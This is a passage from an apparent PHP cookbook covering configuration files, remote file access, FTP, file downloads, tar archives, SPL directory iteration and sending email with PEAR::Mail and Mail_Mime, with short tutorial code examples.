                [javascript] => /home/littleme/myinc
                [images] => /home/littleme/image
            )
    )
    /home/littleme/myinc/css

Discussion

Using an .ini file to store your configuration information offers some advantages over keeping the information in your PHP files. Sometimes, editing PHP files will make your users nervous: it may be hard for them to see which settings are editable, and it may be possible for them to break your script if they change something they shouldn’t. Also, as the .ini file extension differs from those of your script files, it’s relatively easy to secure all .ini files with a .htaccess file that contains a simple directive.[9]

Configuration File Security

Generally speaking, it’s best to not store your configuration file in the web root directory, especially because it usually contains user and password information. Since you can include a file from anywhere within your file system, you might as well play it safe: keep it out of reach of hackers, and of Google, by placing it outside the web root directory on your server.

If you absolutely must store the configuration files in the web root directory, be sure to protect them by including a file directive in your .htaccess file to restrict who may access the files. For additional protection, you can always encrypt the sensitive data (perhaps using a tool such as mcrypt).[10]

[9] See http://httpd.apache.org/docs/2.0/mod/core.html#files for more information about file directives.
[10] http://www.php.net/mcrypt/
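One way to act on the advice about keeping configuration out of the web root is to load the .ini file through a small helper that takes an explicit path. The following is a sketch under assumptions: the function name loadConfigSection and the ../config directory layout are hypothetical, and the section name matches the example.ini shown earlier.

```php
<?php
// Hypothetical helper: returns one section of an .ini file as an array,
// or an empty array if the file or the section cannot be read.
function loadConfigSection($iniPath, $section)
{
    if (!is_readable($iniPath)) {
        return array();
    }

    // TRUE asks parse_ini_file to group the settings by [section] name.
    $all = parse_ini_file($iniPath, true);
    if ($all === false || !isset($all[$section])) {
        return array();
    }

    return $all[$section];
}

// Assumed layout: the config directory sits beside the web root, not inside it,
// so the file cannot be requested with a browser.
$configPath = dirname(__FILE__) . '/../config/example.ini';
$db = loadConfigSection($configPath, 'Database_Settings');
```

Returning an empty array on failure keeps the calling code simple, though a production script might prefer to log the problem or stop outright when its settings are missing.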
  • 190.
How do I access a file on a remote server?

For the most part, PHP can access files on a remote server over the Internet in almost exactly the same way as it does local files.

Solution

The fopen function can take a URL instead of a file path as its first argument. In this example, we open a web page as if we’re opening a file:

urlFopen.php (excerpt)

    <?php
    $fp = fopen('http://www.sitepoint.com/print/758', 'r');
    while (!feof($fp))
    {
        $chunk = fgets($fp);
        echo $chunk;
    }
    fclose($fp);
    ?>

Discussion

PHP implemented the use of streams in version 4.3.0 as a way to unify file, network, data compression, and other operations into a common set of functions.[11] Basically, if you can read the data in a linear fashion, you’re using streams.

The ability to handle both remote and local files as streams is built into the various file functions, which certainly makes life easier. The downside is that by allowing the handling of remote files as if they’re local, PHP makes it very easy for you to unwittingly open your site up to security risks.[12]

[11] Learn more about streams at http://www.php.net/stream/.
[12] You can set the php.ini file setting allow_url_fopen = Off to disable PHP’s ability to open remote files if you prefer.
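Because the same functions serve local and remote files, it can help to make the remote case explicit in your own code. The sketch below is one possible guard, not a complete defense: the function names remoteFilesAllowed, isHttpUrl, and openRemote are hypothetical, and restricting locations to http and https is an assumption about what a given script should accept.

```php
<?php
// Reports whether the allow_url_fopen setting is currently switched on.
function remoteFilesAllowed()
{
    // ini_get returns a string, so convert it to a real boolean.
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

// Accepts only locations that are plainly http or https URLs.
function isHttpUrl($location)
{
    $scheme = parse_url($location, PHP_URL_SCHEME);
    return is_string($scheme)
        && in_array(strtolower($scheme), array('http', 'https'));
}

// Opens a remote page for reading, or returns false if it should not be opened.
function openRemote($url)
{
    if (!remoteFilesAllowed() || !isHttpUrl($url)) {
        return false;
    }
    return fopen($url, 'r');
}
```

A script would then loop over the handle returned by openRemote exactly as in the example above, after first checking that the result is not false. Keeping remote access in one clearly named function also makes it harder to pass a visitor-supplied value to fopen by accident.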
  • 191.
If you choose not to use fopen to open remote files, there are alternatives, including using cURL[13] or sockets.[14] Neither option is as simple as using fopen, though they achieve the same end.

[13] http://www.php.net/curl/
[14] http://www.php.net/sockets/

How do I use FTP from PHP?

One of the great things about PHP is the sheer amount of functionality that's either built into it, or is only an extension away. File Transfer Protocol (FTP) is a great example of such functionality.

Solutions

Here are two popular approaches that you can take to using FTP from PHP.

Using PHP's Built-in FTP Functions

You can use PHP's FTP functionality to have PHP scripts act as clients to an FTP server. This can be useful for countless tasks, whether you're building a web interface for an FTP file repository, or developing a tool to update your site from your PHP development environment. In order to use the FTP functions, you'll need to make sure your host has enabled PHP's FTP functionality.

In this example, we use PHP's FTP functionality to connect to an FTP server and list the files in a directory:

ftp.php (excerpt)

    <?php
    set_time_limit(0);
    $ftpServer = 'localhost';
    $targetDir = '/';
    if (!$fp = ftp_connect($ftpServer, 21, 30))
    {
      die('Connection failed');
    }
    if (!ftp_login($fp, 'anonymous', 'user@domain.com'))
    {
      die('Login failed');
    }
  • 192.
    if (!ftp_chdir($fp, $targetDir))
    {
      die ('Unable to change directory to: ' . $targetDir);
    }
    echo "<pre>Current Directory:" . ftp_pwd($fp) . "\n\n";
    echo "Files Available:\n";
    $files = ftp_nlist($fp, '/');
    foreach ($files as $file)
    {
      echo $file . "\n";
    }
    echo '</pre>';
    ?>

Using the PEAR::Net_FTP Class

PEAR::Net_FTP is a handy class that ensures data is transferred in the correct mode (that is, ASCII or binary), and solves issues relating to recursive uploads and downloads where we need to transfer a directory and its subdirectories from one system to another.

This example uses PEAR::Net_FTP to transfer the contents of a remote directory, including its subdirectories, to the local system:

pearftp.php (excerpt)

    <?php
    set_time_limit(0);
    require_once 'Net/FTP.php';
    $ftpServer = 'localhost';
    $ftpUser = 'anonymous';
    $ftpPass = 'user@domain.com';
    $localDir = 'import/';
    $remoteDir = '/';
    $ftp = new Net_FTP();
    $ftp->setHostname($ftpServer);
    $ftp->setUsername($ftpUser);
    $ftp->setPassword($ftpPass);
    $ftp->connect();
    $ftp->login();
    $ftp->getExtensionsFile('extensions.ini');
    if ($ftp->getRecursive($remoteDir, $localDir))
  • 193.
    {
      echo 'Files transferred successfully';
    }
    else
    {
      echo 'Transfer failed';
    }
    ?>

Note that the getExtensionsFile method of Net_FTP allows you to specify a file that defines particular file extensions, such as .gif and .jpg, as binary or ASCII, ensuring that they will be transferred in the correct manner. The getRecursive method fetches the contents of the specified remote directory, including its subdirectories. Assuming you have permission to place files on the server, you can easily apply the operation in reverse using the putRecursive method. This can be a helpful tool for transferring whole projects between your local development system and your web site, particularly if you're using PHP from the command line.

With the ability to transfer files correctly based on their extension, Net_FTP also makes an excellent choice for individual put and get file operations, as it eliminates the need for you to get the file transfer mode correct. For more information on this PEAR package, see its documentation.[15]

Discussion

When you connect to a normal FTP server by any means, the username and password you provide are sent in clear text to the server. This information can easily be read by malicious parties using a packet sniffer that's plugged in anywhere between you and the server you're connecting to. Be sure to change your passwords regularly and, in general, try to avoid FTP when a better alternative is available. If you have SSH access to your site, there are many free SFTP (SSH File Transfer Protocol) clients that you can use to interact with it.[16]

[15] http://pear.php.net/package/Net_FTP/docs/
[16] Wikipedia provides a list of SFTP clients that makes a good starting point for your research, at http://en.wikipedia.org/wiki/Comparison_of_FTP_clients#Protocol_support.
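If you stay with the built-in FTP functions for single-file transfers, you have to choose the transfer mode yourself. The following is a minimal sketch of the extension-based choice that Net_FTP makes for you, as described earlier in this solution. The function name guessTransferMode and the default extension list are assumptions for this example; Net_FTP reads its own list from the extensions file.

```php
<?php
/**
 * Decide whether a file should be sent in ASCII or binary mode,
 * based on its extension. The default list of text extensions is an
 * assumption for this sketch, not the list that Net_FTP ships with.
 */
function guessTransferMode(
    $fileName,
    array $asciiExtensions = array('txt', 'html', 'php', 'css', 'ini')
) {
    $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    // Anything not known to be text is treated as binary, the safer default
    return in_array($ext, $asciiExtensions, true) ? 'ascii' : 'binary';
}

// Usage with the built-in FTP functions (needs the ftp extension and an
// open connection in $fp, as in ftp.php):
// $mode = guessTransferMode('logo.gif') === 'ascii' ? FTP_ASCII : FTP_BINARY;
// ftp_get($fp, 'import/logo.gif', '/logo.gif', $mode);
```

Defaulting to binary means an unknown file type is copied byte for byte rather than having its line endings rewritten.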
  • 194.
How do I manage file downloads with PHP?

A fairly common problem faced by developers building sites that will publish files for download is the management of those files. Perhaps some of the files should not be publicly available. Perhaps you only want to deliver the file after visitors have provided their details through a web form. Dealing with downloads may involve more than simply storing your file in a public directory and linking to it from your site.

Solution

The trick to handling downloads with PHP is to use a few special HTTP headers and the readfile function:

download.php (excerpt)

    <?php
    $fileName = 'example.ini';
    $mimeType = 'application/zip';
    // strpos returns false when there is no match, and 0 for a match at the
    // start of the string, so compare against false explicitly
    if (strpos($_SERVER['HTTP_USER_AGENT'], 'MSIE 5') !== false or
        strpos($_SERVER['HTTP_USER_AGENT'], 'Opera 7') !== false)
    {
      $mimeType = 'application/x-download';
    }
    header('Content-Disposition: attachment; filename=' . $fileName);
    header('Content-Type: ' . $mimeType);
    header('Content-Length: ' . filesize($fileName));
    readfile($fileName);
    ?>

The Content-Disposition header tells the browser to treat the file as a download (that is, not to display it in the browser window), and gives it the name of the file. The Content-Type header tells the browser what type of file we're sending it. In most cases, the Content-Type should match the type of file you're sending; however, Internet Explorer 5 and Opera browsers have a bad habit of displaying files of recognized types in the browser regardless of the Content-Disposition header, so we set the MIME type to the made-up value application/x-download for those browsers.
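The header handling in download.php can also be wrapped in a small function, which makes it easier to check the file and clean up the file name before anything is sent. This is only a sketch under stated assumptions: the name buildDownloadHeaders is invented for this example, and it returns the header lines instead of sending them so that they can be inspected.

```php
<?php
/**
 * Build the HTTP header lines for a file download.
 * Returns the lines rather than sending them; the caller passes each one
 * to header(). The function name is illustrative.
 */
function buildDownloadHeaders($filePath, $mimeType = 'application/octet-stream')
{
    if (!is_file($filePath) || !is_readable($filePath)) {
        throw new RuntimeException('File not available: ' . $filePath);
    }
    // Keep only the base name, and drop quotes, backslashes, and control
    // characters so the value cannot break out of the header
    $name = preg_replace('/[\x00-\x1F"\\\\]/', '', basename($filePath));
    return array(
        'Content-Type: ' . $mimeType,
        'Content-Disposition: attachment; filename="' . $name . '"',
        'Content-Length: ' . filesize($filePath),
    );
}

// Usage, before any other output is sent:
// foreach (buildDownloadHeaders('example.ini', 'text/plain') as $line) {
//     header($line);
// }
// readfile('example.ini');
```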
  • 195.
Finally, the Content-Length header tells the browser the size of the file, so that it's able to display a download progress bar.

Send HTTP Headers First!

Remember that headers must be delivered before any other content is sent to the browser. Be aware that PHP's output control functions can be helpful here,[17] as they let you send pieces of content to the browser in the correct order: you can hold content already sent for output by PHP while letting the headers pass through to the browser.

[17] http://www.php.net/outcontrol/

Discussion

There's no perfect solution to this type of problem. Imagine, for example, that people decide to make copies of the images they bought from you and redistribute those copies without your knowing. It's almost impossible to prevent customers from doing so unless you provide files that have been modified especially for the purpose of distribution, for example with the addition of watermarks.

Though there's no ideal solution to this problem, it's important to be aware of some of the different strategies for file distribution:

■ Send the file via email. This is a good option for small files, but email systems can place a limit on the size of files a user can receive, block certain types of files, and operate spam filters that can trap your emails.

■ Provide customers with a unique link that they can use to download the file for a limited time, such as a week. If an attempted download fails (for example, the customers lose their Internet connection during the download), this strategy allows them to try again. A unique, random number can be generated and used in the URL for the download. This number corresponds with an entry in a database, which expires after a specified time. Such an approach will at least limit the number of times the file is downloaded, and should help prevent redistribution of the file via the same URL.
  • 196.
■ Provide customers with username and password combinations that they can use to log in to the site and download their own files. This approach has proven particularly effective for SitePoint's online library, where it's used to distribute SitePoint books in Adobe's PDF format. The PDF files are secured with the customer's email address. This discourages customers from redistributing the PDF, as it would be obvious which account was used to redistribute the file.

As I said, there's no perfect solution to this problem. However, greater protection can be achieved if some form of security is built into the file that's being downloaded, such as a password for a document download, a watermark on an image, or a license key for a software package.

How do I create compressed ZIP/TAR files with PHP?

Perhaps you have a directory that contains many files, or different types of files, as well as subdirectories. There may well be situations in which you need to create a download of the whole directory that preserves its original structure. The typical command-line approach to creating such a download on Unix-based systems is first to create an "archive" file such as a .tar file (.tar files are "Tape Archives" and were originally conceived to help back up a file system onto tape), then compress that file with the gzip or bzip2 utilities.

Solutions

On a *nix-based system, you'd usually use the tar functionality available through the command line to create these files. Using PHP's system function, you could execute these commands from a PHP script, assuming your web server had permission to use the tar and gzip or bzip2 executables. However, your server probably won't have these permissions, so in this solution, we chose to use the PEAR::Archive_Tar package instead. This package allows you to create archives from data stored in your database, or from nodes in an XML document, as well as to handle basic files.
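For completeness, the command-line route mentioned above might look something like the following sketch, for servers where PHP is allowed to run tar. The function name buildTarCommand and the paths in the usage note are assumptions for this example; escapeshellarg and system are standard PHP functions.

```php
<?php
/**
 * Build a shell command that archives a directory and compresses it with gzip.
 * Assumes a Unix-like server with tar on the PATH.
 * escapeshellarg protects each argument from being interpreted by the shell.
 * The function name is illustrative.
 */
function buildTarCommand($archivePath, $sourceDir)
{
    // -C changes into the parent directory first, so the archive stores
    // paths relative to it instead of absolute paths
    return 'tar -czf ' . escapeshellarg($archivePath)
        . ' -C ' . escapeshellarg(dirname($sourceDir))
        . ' ' . escapeshellarg(basename($sourceDir));
}

// Usage (hypothetical paths):
// system(buildTarCommand('/tmp/site.tar.gz', '/home/littleme/site'), $exitCode);
// if ($exitCode !== 0) {
//     echo 'tar failed';
// }
```

Building the command separately from running it makes it easy to log or inspect exactly what will be executed.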
  • 197.
Watch Out for E_STRICT Errors

The PEAR::Archive_Tar package was originally developed with PHP 4. If you use it in PHP 5 with E_STRICT errors turned on, you'll receive E_STRICT errors for the deprecated use of references when passing objects.

Compressing Simple Files

In this example, we create an archive file using the Archive_Tar class and add files to it. Then we do the reverse and extract all the files we added:

tar.php (excerpt)

    <?php
    require_once 'Archive/Tar.php';
    $tar = new Archive_Tar('demo.tar.gz', 'gz');
    $files = array(
      'example.ini',
      'writeSecureScripts.html'
    );
    $tar->create($files);
    echo 'Archive created';
    $tar2 = new Archive_Tar('demo.tar.gz');
    $tar2->extract('demo');
    echo 'Archive extracted';
    ?>

This code is fairly straightforward. When we're instantiating the class, the second argument to the constructor function tells Archive_Tar which type of compression to use (the alternative to gz, which is used for gzip compression, is bz2, used for bzip2 compression). Simply omit the second argument if you don't require compression. The array of filenames needs to be specified when you use the create method, keeping the file paths relative to the location at which the script is executed. And that's it for file compression!

The process of extraction is actually easier. We call the extract method, and provide a path (again, one that's relative to the location of the script) to indicate the location to which the method should extract the archive; in this case, the subdirectory demo. It's nice and easy!
  • 198.
Compressing Database Data

Archive_Tar is particularly interesting in that it allows strings to be added to the archive as files. This hypothetical example demonstrates the archiving of a web site's database of articles: all the articles are retrieved from the database and the body text of each article is stored in a text file with a filename that matches the article's ID:

tar2.php (excerpt)

    // PDO expects a DSN string followed by the username and password;
    // a MySQL database is assumed here
    $db = new PDO('mysql:host=' . DBHOST . ';dbname=' . DBNAME, DBUSER, DBPASS);
    $tar = new Archive_Tar('demo/articles.tar.gz', 'gz');
    $sql = "SELECT article_id, body FROM articles";
    foreach($db->query($sql) as $row)
    {
      $tar->addString('articles/' . $row['article_id'] . '.txt', $row['body']);
    }
    echo 'Article archive created';

Here, we've queried a database using the PDO class available in PHP 5, and used the addString method to add some of the data we fetched to the archive as files. The first argument represents the path and filename under which the string should be stored; the second is the string itself.

That should give you a general idea of when Archive_Tar can be useful to you.

How do I work with files using the Standard PHP Library in PHP 5?

With the release of PHP 5, we were given access to the SPL (Standard PHP Library). The SPL is a library of classes and interfaces designed to solve a variety of standard problems. As you may have guessed, reading directories and getting information about the files they contain is one such problem.

The DirectoryIterator class is part of the SPL and is a convenient way to read file directories and retrieve file information. You can also write to the files. Additionally, the DirectoryIterator class has an openFile method that creates a SplFileObject instance for your manipulatory pleasure! Working with the
  • 199.
SplFileObject is outside what we plan to cover in this solution, though, so be sure to check out the SPL documentation to learn more.[18]

[18] http://www.php.net/~helly/php/ext/spl/

Solution

In this example, we use the DirectoryIterator class to iterate over a file directory and discover everything there is to know about the example.ini file:

dirIterator.php (excerpt)

    <?php
    try
    {
      // handle the various files in the directory like an array
      foreach ( new DirectoryIterator('./') as $Item )
      {
        echo $Item."\n";
        // tell me about this one file
        if($Item->getFilename() == 'example.ini')
        {
          echo "\tProperties of example.ini\n";
          echo "\tFile name = " . $Item->getFilename() . "\n";
          echo "\tPath = " . $Item->getPath() . "\n";
          echo "\tPath name = " . $Item->getPathname() . "\n";
          echo "\tPermission = " . $Item->getPerms() . "\n";
          echo "\tInode = " . $Item->getInode() . "\n";
          echo "\tSize = " . $Item->getSize() . "\n";
          echo "\tOwner = " . $Item->getOwner() . "\n";
          echo "\tGroup = " . $Item->getGroup() . "\n";
          echo "\tAtime = " . $Item->getATime() . "\n";
          echo "\tMtime = " . $Item->getMTime() . "\n";
          echo "\tCTime = " . $Item->getCTime() . "\n";
          echo "\tType = " . $Item->getType() . "\n";
          echo "\tWritable = " . $Item->isWritable() . "\n";
          echo "\tReadable = " . $Item->isReadable() . "\n";
          echo "\tExecutable = " . $Item->isExecutable() . "\n";
          echo "\tIs file = " . $Item->isFile() . "\n";
          echo "\tIs directory = " . $Item->isDir() . "\n";
          echo "\tIs link = " . $Item->isLink() . "\n";
          echo "\tIs dot = " . $Item->isDot() . "\n";
          echo "\tTo string = " . $Item->__toString() . "\n";
          echo '------------------------------------------------'."\n";
  • 200.
          echo "\tFile contents = \n";
          readfile($Item->getPathname());
          echo '------------------------------------------------'."\n";
        }
      }
      echo "\n\nAll the class methods\n";
      // give me all the methods available to the Directory Iterator
      foreach( get_class_methods('DirectoryIterator') as $methodName)
      {
        echo $methodName."\n";
      }
    }
    catch(Exception $e){
      // handle my exception
      echo 'No files Found! Message returned: '.$e->getMessage()."\n";
    }
    ?>

Discussion

We started the code with a simple try {…} catch {…} block to handle any exceptions that might occur while we're working on the directory.[19]

Next, we meet the DirectoryIterator constructor in a foreach loop. The DirectoryIterator is an implementation of the Iterator design pattern.[20] For a class to implement the Iterator design pattern, it must provide a way to access the elements of the instantiated object in a sequential way. The DirectoryIterator object can be handled like an array and like an object. So we can put it in the foreach loop to iterate over the various files in the path provided to the constructor, which is similar to what we did earlier in the section called "How do I examine directories with PHP?"

We then chose a file (example.ini) and looked at all its properties using the file object's methods, and obtained much the same information we obtained earlier in "How do I examine directories with PHP?" but without all the if statements!

[19] Exceptions are generally considered to be the better, object oriented way of handling errors, and are seen as preferable to the if block statements we saw earlier.
[20] If you don't know what a design pattern is yet, don't worry! Plenty of information is available on the Web, for example, at Wikipedia: http://en.wikipedia.org/wiki/Iterator_pattern. The PHP Manual also has an entry on iteration at http://www.php.net/manual/en/language.oop5.iterations.php.
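In everyday use you rarely need every property at once. As a smaller illustration of the same iteration, this sketch collects just the name and size of each regular file in a directory. The function name listFileSizes is an assumption for this example; isDot, isFile, getFilename, and getSize are the DirectoryIterator methods used in the listing above.

```php
<?php
/**
 * Return the names and sizes (in bytes) of the regular files in a directory.
 * The function name is illustrative.
 */
function listFileSizes($dir)
{
    $sizes = array();
    foreach (new DirectoryIterator($dir) as $item) {
        // Skip "." and "..", subdirectories, and anything that is not a regular file
        if ($item->isDot() || !$item->isFile()) {
            continue;
        }
        $sizes[$item->getFilename()] = $item->getSize();
    }
    // Directory order is not guaranteed, so sort by file name
    ksort($sizes);
    return $sizes;
}

// Usage:
// foreach (listFileSizes('./') as $name => $bytes) {
//     echo $name . ': ' . $bytes . " bytes\n";
// }
```

If the directory cannot be opened, the DirectoryIterator constructor throws an exception, so the call can be wrapped in a try {…} catch {…} block just as in the solution.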
  • 201.
Last of all, we wanted to access a full listing of the DirectoryIterator object's methods. We used the get_class_methods function in another foreach loop to echo those methods out for us.

If you want more information on DirectoryIterator, first look at the SPL documentation and all the method pages,[21] paying particular attention to the user comments. You can also review the SPL documentation with UML (Unified Modeling Language) diagrams,[22] which will give you the opportunity to see what else is available in the SPL.

Summary

As you can see, working with files isn't that hard! Actually, it's fairly easy once you know what to use and how to use it. Plenty of file-related tools are available in the form of PHP's built-in file system and streams functionality, numerous PEAR packages, and the PHP 5 Standard PHP Library (SPL). Each offers something to make your life easier. Just don't let your boss know how easy it really is!

[21] http://www.php.net/spl/
[22] http://www.php.net/~helly/php/ext/spl/
  • 203.
Chapter 7
Email

Building online applications isn't just about delivering pages to web browsers; such applications often involve email functionality as well. Email is used for a variety of tasks within a web application, including the mailing of regular newsletters as a means to stay in touch with visitors, and the provision of automated notifications for user registration systems. Once you know how to create email efficiently in PHP, it's much easier to add email functionality to your web site, and to communicate with your site's visitors.

How do I send a simple email?

So you need to send a simple text email. It's nothing fancy, just a brief text message to pass on some information. Let's see how it's done.

Solutions

Two simple approaches are available. The first uses PHP's built-in mail function, while the second relies on the PEAR::Mail package.
  • 204.
Using the PHP mail Function

Sending simple emails is easy with PHP's mail function.[1] You need only one line of code to send a message. What could be easier? Here's how it works:

[1] http://www.php.net/manual/en/function.mail.php

phpMail.php

    <?php
    mail('you@yourdomain.com', 'Howdy', 'Glad to meet you.',
        'From: me@mydomain.com');
    ?>

The arguments supplied to the mail function above contain the following information, in the order supplied here:

■ the address to which we're sending the email
■ the subject of the email
■ the body of the email

The last argument represents any extra header information you'd like to include in the email. In the example above, we've added a From header to set the address from which the message was sent.

Using the PEAR::Mail Package

In this example, we're sending the same email using the PEAR::Mail package:

pearMail.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require 'Mail.php';
    $mail = Mail::factory('mail');
    $headers = array(
      'From' => 'me@mydomain.com',
      'Subject' => 'Howdy'
    );
    $succ = $mail->send('you@yourdomain.com', $headers,
        'Glad to meet you.');
    if (PEAR::isError($succ))
  • 205.
    {
      echo 'Email sending failed: ' . $succ->getMessage();
    }
    else
    {
      echo 'Email sent successfully';
    }
    ?>

Let's ignore the first line for a minute, and look instead at the second line, where we include the PEAR::Mail package. Next, we use the static Mail::factory method to instantiate a Mail object that can send email for us. We supply the argument 'mail' to the factory method to indicate that we wish to use PHP's built-in mail function. We then create an array for the header values we wish to include in our email, and finally call the Mail->send method, supplying the recipient's email address, our array of headers, and the body text of the email.

The Mail->send method will return true if successful, and a PEAR_Error object if it's unsuccessful. We can test for the presence of an error using the PEAR::isError method and act accordingly.

Watch Out for E_STRICT Errors

The PEAR::Mail package was originally developed with PHP 4. If you use it in PHP 5 with E_STRICT errors turned on, you'll receive E_STRICT errors. In our example above, and in others further on, we use the error_reporting function to set the level of reported errors to E_ALL, preventing E_STRICT errors from appearing in PHP 5.

Discussion

The mail function can integrate with the local sendmail client (an email application widely used on Unix-based systems), or with a remote SMTP (Simple Mail Transfer Protocol) server if you lack a sendmail-compatible client. Your web host should be able to supply the relevant SMTP server details for use in your script. However, if you're using Windows for your development environment, you'll need to tell PHP which SMTP server it should use to send mail by modifying the following settings in php.ini:
  • 206.
    [mail function]
    ; For Win32 only.
    SMTP = smtp.yourdomain.com
    smtp_port = 25
    sendmail_from = you@yourdomain.com

Here, we've set the SMTP setting to the domain name of the SMTP server, which, in the vast majority of cases, will be the SMTP server provided by your ISP. We've also set the smtp_port setting to the appropriate server port number (the default is 25). The sendmail_from setting represents the sending address for your emails.

Most of the emails you'll want to send are probably not as simple as those we've been dealing with here. Even if you wanted to keep your emails simple and use only plain text, things could start to get a little complex as you started adding extra headers, composing longer messages, and including attachments.

The second solution presented here uses more code than the first, which used only one line of PHP, but in exchange for the extra code we get a lot more flexibility, and we'll find the system easier to use when we create more complex emails. For that reason, the remaining examples will use the various classes available from the PEAR package.

How do I simplify the generation of complex emails?

Using the mail function is fine for simple messages, but its limitations become apparent when you attempt to create more complex emails. For instance, you might decide you want to have your own email address appearing in the From field of a message, to add people's names alongside their addresses, to carbon copy (CC) email to a number of recipients, or to send your emails to a different SMTP server. In any of these cases, you'll need something more than mail to get the job done.
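To see where the effort goes, here is a minimal sketch of what assembling such headers by hand for the mail function involves. It covers named addresses and a CC recipient, but not a different SMTP server, and every extra header adds to the bookkeeping. The function name buildMailHeaders is an assumption for this example; the addresses are the placeholder ones used elsewhere in this chapter.

```php
<?php
/**
 * Join header name/value pairs into the string expected by the fourth
 * argument of mail(). Names or values that contain line breaks are rejected,
 * because they could be used to inject extra headers.
 * The function name is illustrative.
 */
function buildMailHeaders(array $headers)
{
    $lines = array();
    foreach ($headers as $name => $value) {
        if (preg_match('/[\r\n]/', $name . $value)) {
            throw new InvalidArgumentException('Line break in header: ' . $name);
        }
        $lines[] = $name . ': ' . $value;
    }
    // Mail headers are separated by CRLF
    return implode("\r\n", $lines);
}

// Usage:
// $extra = buildMailHeaders(array(
//     'From' => 'Me <me@mydomain.com>',
//     'Cc'   => 'Mr Example <example@exampledomain.com>',
// ));
// mail('you@yourdomain.com', 'Howdy', 'Glad to meet you.', $extra);
```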
Enter: the PEAR::Mail and PEAR::Mail_Mime classes.[2] These classes give the mail function a raft of extra functionality, such as the ability to include attachments, create HTML and mixed-format emails, bypass the mail function completely, and [2] See the Mail package documentation at http://pear.php.net/manual/en/package.mail.mail.php, and the Mail_Mime documentation at http://pear.php.net/manual/en/package.mail.mail-mime.php.
  • 207.
connect to an SMTP server directly. These classes also provide an API that makes the construction of more complex emails very easy.

Solution

This code uses a specified SMTP server to send email:

pearMailSMTP.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require 'Mail.php';
    $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.com'));
    $hdrs = array(
      'From' => 'Me <me@mydomain.com>',
      'CC' => 'Mr Example <example@exampledomain.com>',
      'Subject' => 'Howdy'
    );
    $body = 'Glad to meet you.';
    $succ = $mail->send('you@yourdomain.com', $hdrs, $body);
    if (PEAR::isError($succ))
    {
      echo 'Email sending failed: ' . $succ->getMessage();
    }
    else
    {
      echo 'Email sent successfully';
    }
    ?>

Discussion

Thanks to the PEAR::Mail class, we're no longer limited to using PHP's mail configuration, so we can set up mail as we choose. The Mail::factory method accepts parameters for the type of mail system you want to use, and for any options you want to specify for your back-end setup.[3]

[3] See http://pear.php.net/manual/en/package.mail.mail.factory.php for more information on the options available for back-end mail systems.

Mail::factory accepts one of the following:
  • 208.
mail
    uses the configured PHP mail settings
sendmail
    allows you to control which sendmail program is used, and which options are sent to it
smtp
    contacts an SMTP server to send the mail for you

When we work with multipart emails (for example, emails that include text and HTML parts) we'll use the PEAR::Mail_Mime class as well. It works alongside the PEAR::Mail class, building the message body and headers that we then hand to Mail for sending, and it provides a number of additional features to make our lives much easier.

How do I add attachments to messages?

Sending an attachment with your email is incredibly easy with the PEAR::Mail_Mime class.

Solution

Take a look at this code, which shows the Mail_Mime->addAttachment method in action:

attachment.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require 'Mail.php';
    require 'Mail/mime.php';
    $mime = new Mail_Mime("\r\n");
    $mime->setTXTBody('See attached text file.');
    $mime->addAttachment(
        'test.txt',
        'text/plain',
        'attached.txt',
        TRUE,
        'quoted-printable'
    );
    $body = $mime->get();
    $hdrs = $mime->headers(array(
        'From' => 'me@mydomain.com',
        'Subject' => 'File Attachment'
    ));
    $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.com'));
  • 209.
    $succ = $mail->send('you@yourdomain.com', $hdrs, $body);
    if (PEAR::isError($succ))
    {
      echo 'Email sending failed: ' . $succ->getMessage();
    }
    else
    {
      echo 'Email sent successfully';
    }
    ?>

First, we instantiate a Mail_Mime object, passing the line endings we wish to use for the email. The text for the body of the email is then set using the Mail_Mime object's setTXTBody method, and we add the attachment using the addAttachment method. Next, we call the get method to build the email's body, and the headers method to create any special headers we might need. The get method should always be called before the headers method.

Then, just like the previous examples, we use the Mail::factory method to instantiate our Mail object, and we call the send method to send our email, supplying it with the body and header parts we built using the Mail_Mime class. This solution's simple and powerful, just how we like it!

Discussion

You can transfer more than just text files with the addAttachment method.[4] Feel free to use it for images or application files. Just be sure to specify the correct content type for the file in the second argument. If you don't supply any more arguments to the method, the defaults will be used, and usually they're fine. Here's an example:

    $mime->addAttachment('php.gif', 'image/gif');

If the defaults aren't suitable, you can specify precisely how you want the file to be attached to the email. The third argument represents the filename you want the attachment to display on the email.

[4] To view the full documentation for the addAttachment method, see http://pear.php.net/manual/en/package.mail.mail-mime.addattachment.php.
  • 210.
Don't feel like using a text file? Perhaps you'd rather use a variable containing the text that you want to attach? No problem. Place that variable in the first argument, and set the fourth to false, like so:

    $txt = 'testing testing - 1, 2, 3';
    $mime->addAttachment(
        $txt,
        'text/plain',
        'TestMe.txt',
        false,
        'quoted-printable'
    );

The fifth argument represents the transfer encoding. While the default encoding, 'base64', is fine for most files, for text-based files, you may wish to use 'quoted-printable' instead.

Did You See "Notice" Error Messages?

At the time of writing, a number of Notice log messages will be thrown from the PEAR::Mail_Mime class if you use PHP 5.1.6 for this solution. These notices are the result of a change to the PHP internals, for which a bug report has been submitted to the PHP development team, but which doesn't affect the output of the script. If the Notice messages bother you, turn them off with the error_reporting function, but remember that by doing this, you could also very easily hide a problem with your script.

How do I send HTML email?

Most email clients are capable of understanding HTML that's placed in the body of an email. Using PEAR::Mail_Mime, it's easy to add HTML to emails, and even to embed images within the document. This class will automatically determine whether or not you've placed HTML in the body of the message and set the MIME headers accordingly. You can also add an alternative text version of your email for use by recipients whose email clients cannot, or choose not to, display HTML emails.
  • 211.
Solution

The code below sends a multipart message (one part is HTML, while the other is plain text) as well as an image that's embedded in the HTML with an img tag:

htmlEmail.php (excerpt)

    <?php
    error_reporting(E_ALL);
    include('Mail.php');
    include('Mail/mime.php');
    $text = "Text version of email\nMessage made with PHP";
    $html = '<html><body>HTML version of email<br />';
    $html .= 'Message made with <img src="12345" /></body></html>';
    $crlf = "\n";
    $hdrs = array(
      'From' => 'me@mydomain.com',
      'Subject' => 'Test HTML Email with Embedded Image'
    );
    $mime = new Mail_mime($crlf);
    $mime->setTXTBody($text);
    $mime->addHTMLImage('php.gif', 'image/gif', '12345', true);
    $mime->setHTMLBody($html);
    $body = $mime->get();
    $hdrs = $mime->headers($hdrs);
    $mail = Mail::factory('mail');
    $succ = $mail->send('you@yourdomain.com', $hdrs, $body);
